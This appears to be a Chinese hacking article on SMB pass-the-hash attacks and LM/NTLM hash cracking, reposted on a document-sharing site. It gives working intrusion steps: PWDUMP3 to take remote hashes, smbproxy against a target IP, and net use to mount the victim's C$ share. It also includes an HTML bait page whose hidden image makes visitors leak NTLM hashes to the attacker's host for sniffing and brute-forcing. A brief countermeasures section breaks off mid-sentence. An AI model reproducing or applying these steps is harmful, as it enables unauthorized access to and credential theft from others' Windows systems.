- 1、本文档共3页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SMB 攻击和 hash 散列猜测的研究
今天上午刚看到 ciel 兄的新研究成果,以下是原文的引用
SMBPROXY早上测试成功! !
一直忙着玩 UNIX,所以很少留神 WIN 下面的东西, 虽然 HAOWAWA 很早公布了 SBMPROXY,
我也下了,可是一直没时间测试,今天早上终于测试成功了
步骤
1:用 PWDUMP3 获取远程主机 HASH值 存为 A 。TXT
2 :开一个 CMD 输入
net stop server
smbproxy -s 目标 IP -f E:\A.TXT
3 :net use H : c$ “gghhhhhhhhh ” /u:administrator
等我进入 H 盘时,确实看到的是对方的 C 盘文件
闲来无聊,动动生锈的脑袋,问问古浪兄,他那边有没有实践情况,测试范围增大一圈:他
利用 cain+sniffer 来实现,原理相同,得到 hash 值,调到 lc 中暴力破解!
继续动动脑袋, 据说 xhacker 和 hawawa 利用网页来抓 hash,很是想不同其中原理! !so ,test
一下,问 xhacker 兄,是否也只是利用本 ip 做一个 恶心 网页,来勾引对方
来访问,只因为大约同一时间内,破网页的访问次数该不会大于 2. so,利用 cain 或者 lc 来抓
hash 值。然后破解 ……入侵,答曰:然也 (慕容无语,只想扔鸡蛋砸这些家伙 )
下面是偶被他们勾引以后,对 hash 的一些研究:国内外高手很多次都讨论过此事了吧,只
是大概想想太过危险,不合适公布, so !!!继续成为我等鸟级 kid 们的研究对象和渴望!
LM 算法:
从帐户密码的两个独立的 7 个字符分段创建用户的散列的,
前 8 位字节 派生自帐户的前 7 位
后 8 位字节 派生自帐户密码的后 7 位字符
每块都可通过对所有可能的 8 位字节组合进行穷举攻击而猜测。
NTLM 质询 --应答的 应答 部分是通过使用 LM 散列的派生物对 8 字节的 质询 进行加密而创
建的,因为派生比较简单, so 很容易的通过穷举的方法猜测出原始的 LM 散列值。
一旦得到 LM 和 NTLM 散列, 就可导入到 L0phtcrack(lc) 中进行破解 lc 的 smbcapture(lan
内通用,可抓到 n 个 ip ,具体看你的 LAN 有多大了? )
1。只可从共享介质中捕获质询 --应答通信。 (交换网络中不可行) ,不过,我们可使用 arp
重定向或者其他 ip 欺骗方法来做啦!
比如: smb.htm
html
title 嘿嘿,抓你 hash,只要你访问我就行 /title
body
img src=/null.gif height=1 width=1/img
/body
/html
其中 ip 或者 dns,具体看你自己的了,主要是和对方建立连接就可以! !
2 。必须都是 windows 系统
3 。必须,装有 winpcap ,最新版本更好(默认 lc 该安装了吧)
安全对策
攻击者, 不需要首先获得 mac 或者 ip 地址, 因为混乱模式里, 乱抓就可以抓到一大把了 (除
非你想固定抓某个 ip )
禁止散列在网络中传播,本地安全策略或者 mmc 中,安全选项
KB 文档 Q239869 中:
level0 发送 LM 和 NTLM 应答,从不使用 NTLM V2 会话安全。客户端使用 LM 和 NTLM 认证,
从不使用 NTLM V2 会话安全;域控
文档评论(0)